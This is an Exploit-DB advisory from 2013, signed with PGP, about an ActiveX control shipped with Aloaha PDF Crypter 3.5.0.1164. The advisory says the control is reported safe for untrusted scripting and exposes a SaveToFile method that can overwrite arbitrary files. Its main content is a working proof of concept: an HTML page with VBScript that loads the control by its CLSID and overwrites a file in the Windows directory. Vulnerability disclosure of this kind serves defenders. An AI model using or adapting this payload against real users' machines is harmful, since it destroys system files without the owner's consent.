Aloaha PDF Crypter (3.5.0.1164) - ActiveX Arbitrary File Overwrite

EDB-ID:

24319

CVE:


Author:

shinnai

Type:

dos

Platform:

Windows

Published:

2013-01-24

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

============================================================================================
 TITLE:
============================================================================================
 Aloaha PDF Crypter (3.5.0.1164) activex arbitrary file overwrite

 url: http://www.aloaha.com/
 download: http://www.aloaha.com/download/aloaha_crypter.zip
 author: shinnai (http://shinnai.altervista.org)
============================================================================================
 FILE INFO:
============================================================================================
 File: C:\WINDOWS\system32\vbCrypt.dll
 InternalName: ebCrypt
 OriginalFilename: ebCrypt.DLL
 FileVersion: 2.0.0.2087
 FileDescription: ebCrypt Main Module
 Product: ebCrypt
 ProductVersion: 2.0.0.2087
 Language: English (United States)
 MD5 hash: b262cb93c555c3c9604502d071a783ec
============================================================================================
 ACTIVEX INFO:
============================================================================================
 ProgID: EbCrypt.eb_c_PRNGenerator.1
 GUID: {B1E7505E-BBFD-42BF-98C9-602205A1504C}
 Description: eb_c_PRNGenerator Class
 Safety report:
 RegKey Safe for Script: False
 RegKey Safe for Init: False
 Implements IObjectSafety: True
 IDisp Safe:  Safe for untrusted: caller,data
============================================================================================
 BUG:
============================================================================================
 This activex contains the "SaveToFile" which could be used to overwite arbitrary files on
 pc users.
============================================================================================
 PROOF OF CONCEPT
============================================================================================
 <html>
  <object classid='clsid:B1E7505E-BBFD-42BF-98C9-602205A1504C' id='test' ></object>
  <script language='vbscript'>
   test.SaveToFile "c:\windows\_system.ini"
  </script>
 </html>
============================================================================================
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (MingW32)

iQIcBAEBAgAGBQJQ/6sFAAoJEJlK/ai8vywmSUUQAK38iSzcZ3JsD+Kskt1Zwvhc
hynADNu17uvlcaUoK7uFc8BwOkRT6XqlmJe6Gab02jPClkmaHRH0Oh8/Zxu8T5Y5
TsLrw7YgUFQDelS4zL7yxZIKofio3GVS55vo3JL1bJvKrANp99BYcQFX4t5539g9
l/kYf51QGhWXxEvYFlSpDZ8km8dCElLYTT47oFjXMFSpBHyodrU4MPh4FGLoN1XN
TLrYDOoTke+RXit/nzNKqbNzXIXmBVTBWfYdPLWwcc07Go4KR3tKGl1ELSCczHeg
PFWCbcJ18l56809afAviUUvrgb1g9WG9ZY5jMxXP1t5oqeeLJKfKhX0KipVtoBUa
dZZWJOLp6Mmi8VBzfkTu50jZy1B4EtUSTlmj5A2SKBQRM/0SSqZO1LjwE39fQ9gh
6avUHhPgV9OLqaWxVbNHy6RYBFYHlo46ytvIhgBDU0VPqwI50yyzrObxbRAhCD19
GjgSBtZqOJQ9sFwiXS+HHQcCt8ZR6pf09yWmxDr+1L7D4yKvq/Z2TsBuYKMUGazW
Xni6lxddI7LUN88LXlrV8cCoJ7R2gBe9Tg3nUBIDLpXM4hyeU1DTL0kFNATUk3P5
7xFde64BvKL2GAzEip8j9PuGhezfflIIhsxPHUEemOvsUctqXEQI8DtC0GkRaT3J
enDko6b3T5jOt6axrWGb
=H+Gh
-----END PGP SIGNATURE-----